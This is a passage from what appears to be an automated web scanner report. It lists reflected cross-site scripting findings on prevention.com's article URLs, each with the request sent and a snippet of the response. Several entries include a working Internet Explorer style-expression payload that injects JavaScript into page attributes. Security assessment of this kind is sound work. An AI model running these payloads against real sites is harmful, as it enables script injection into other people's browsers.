2.108. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d7a0'%3b1a5653adf9 was submitted in the REST URL parameter 6. This input was echoed as 1d7a0';1a5653adf9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____1d7a0'%3b1a5653adf9 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:10:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____1d7a0';1a5653adf9&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.109. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e463'%3b56205553b1a was submitted in the REST URL parameter 3. This input was echoed as 7e463';56205553b1a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/find-a-workout7e463'%3b56205553b1a/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/find-a-workout7e463';56205553b1a/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.110. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e788f'style%3d'x%3aexpression(alert(1))'6ab22e02f was submitted in the REST URL parameter 3. This input was echoed as e788f'style='x:expression(alert(1))'6ab22e02f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/fitness/find-a-workoute788f'style%3d'x%3aexpression(alert(1))'6ab22e02f/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:06:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<input type='hidden' id='category_core' value='Fitness-Find A Workoute788f'style='x:expression(alert(1))'6ab22e02f'>
...[SNIP]...

2.111. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58d30'%3bcf4179973ea was submitted in the REST URL parameter 4. This input was echoed as 58d30';cf4179973ea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/find-a-workout/total-body-toning58d30'%3bcf4179973ea/article/31e69dc91e22e110VgnVCM10000013281eac____/ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/find-a-workout/total-body-toning58d30';cf4179973ea/article/31e69dc91e22e110VgnVCM10000013281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.112. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 19f97'style%3d'x%3aexpression(alert(1))'7bb7b9ba7b7 was submitted in the REST URL parameter 5. This input was echoed as 19f97'style='x:expression(alert(1))'7bb7b9ba7b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/fitness/find-a-workout/total-body-toning/article19f97'style%3d'x%3aexpression(alert(1))'7bb7b9ba7b7/31e69dc91e22e110VgnVCM10000013281eac____/ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1793
Date: Thu, 10 Mar 2011 17:08:16 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 74609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Fitness-Find A Workout-Total Body Toning-Article19f97'style='x:expression(alert(1))'7bb7b9ba7b7'>
...[SNIP]...

2.113. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3ba5'%3b71644938b8 was submitted in the REST URL parameter 6. This input was echoed as d3ba5';71644938b8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____d3ba5'%3b71644938b8/ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:09:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____d3ba5';71644938b8&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.114. http://www.prevention.com/health/health/a-spoonful-of-health/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/health/a-spoonful-of-health/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccb17'%3b29e646bb194 was submitted in the REST URL parameter 3. This input was echoed as ccb17';29e646bb194 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/health/ccb17'%3b29e646bb194/ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1796
Date: Thu, 10 Mar 2011 17:06:59 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 75050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<script language="javascript">
                                       gSiteLife.SummaryBlogsRecentPostsByTag(3, 'ccb17';29e646bb194')
                                   </script>
...[SNIP]...

2.115. http://www.prevention.com/health/health/a-spoonful-of-health/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/health/a-spoonful-of-health/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f24a2'style%3d'x%3aexpression(alert(1))'f6353e58e8 was submitted in the REST URL parameter 3. This input was echoed as f24a2'style='x:expression(alert(1))'f6353e58e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/health/a-spoonful-of-healthf24a2'style%3d'x%3aexpression(alert(1))'f6353e58e8/ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1792
Date: Thu, 10 Mar 2011 17:06:05 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 76657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Health-A Spoonful Of Healthf24a2'style='x:expression(alert(1))'f6353e58e8'>
...[SNIP]...

2.116. http://www.prevention.com/health/health/health-concerns/cold-flu [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/health/health-concerns/cold-flu

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8506b'style%3d'x%3aexpression(alert(1))'ca456ab48dc was submitted in the REST URL parameter 3. This input was echoed as 8506b'style='x:expression(alert(1))'ca456ab48dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/health/health-concerns8506b'style%3d'x%3aexpression(alert(1))'ca456ab48dc/cold-flu HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1798
Date: Thu, 10 Mar 2011 17:05:59 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 76868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Health-Health Concerns8506b'style='x:expression(alert(1))'ca456ab48dc-Cold Flu'>
...[SNIP]...

2.117. http://www.prevention.com/health/health/health-concerns/cold-flu [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/health/health-concerns/cold-flu

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c7db'%3b359e302bdd was submitted in the REST URL parameter 3. This input was echoed as 8c7db';359e302bdd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/health/8c7db'%3b359e302bdd/cold-flu HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1798
Date: Thu, 10 Mar 2011 17:07:05 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 75295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<script language="javascript">
                                       gSiteLife.SummaryBlogsRecentPostsByTag(3, '8c7db';359e302bdd')
                                   </script>
...[SNIP]...

2.118. http://www.prevention.com/health/health/health-concerns/cold-flu [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/health/health-concerns/cold-flu

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f7759'style%3d'x%3aexpression(alert(1))'1a2d5b8c257 was submitted in the REST URL parameter 4. This input was echoed as f7759'style='x:expression(alert(1))'1a2d5b8c257 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/health/health-concerns/cold-fluf7759'style%3d'x%3aexpression(alert(1))'1a2d5b8c257 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1796
Date: Thu, 10 Mar 2011 17:08:32 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 78626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Health-Health Concerns-Cold Fluf7759'style='x:expression(alert(1))'1a2d5b8c257'>
...[SNIP]...

2.119. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 81c81'style%3d'x%3aexpression(alert(1))'b51fcab1079 was submitted in the REST URL parameter 3. This input was echoed as 81c81'style='x:expression(alert(1))'b51fcab1079 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/health/healthy-living81c81'style%3d'x%3aexpression(alert(1))'b51fcab1079/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:06:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<input type='hidden' id='category_core' value='Health-Healthy Living81c81'style='x:expression(alert(1))'b51fcab1079'>
...[SNIP]...

2.120. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1fd48'%3b522e0195e8a was submitted in the REST URL parameter 3. This input was echoed as 1fd48';522e0195e8a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/health/healthy-living1fd48'%3b522e0195e8a/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 92258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/health/healthy-living1fd48';522e0195e8a/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.121. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9f35'%3be400bf10631 was submitted in the REST URL parameter 4. This input was echoed as b9f35';e400bf10631 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tipsb9f35'%3be400bf10631/article/16ee7ede8d77e210VgnVCM10000030281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tipsb9f35';e400bf10631/article/16ee7ede8d77e210VgnVCM10000030281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.122. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f194c'style%3d'x%3aexpression(alert(1))'ba472fc708f was submitted in the REST URL parameter 5. This input was echoed as f194c'style='x:expression(alert(1))'ba472fc708f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/articlef194c'style%3d'x%3aexpression(alert(1))'ba472fc708f/16ee7ede8d77e210VgnVCM10000030281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1791
Date: Thu, 10 Mar 2011 17:08:47 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 75725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Health-Healthy Living-Carrie Ann Inaba S Health And Fitness Tips-Articlef194c'style='x:expression(alert(1))'ba472fc708f'>
...[SNIP]...

2.123. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____

Issue detail

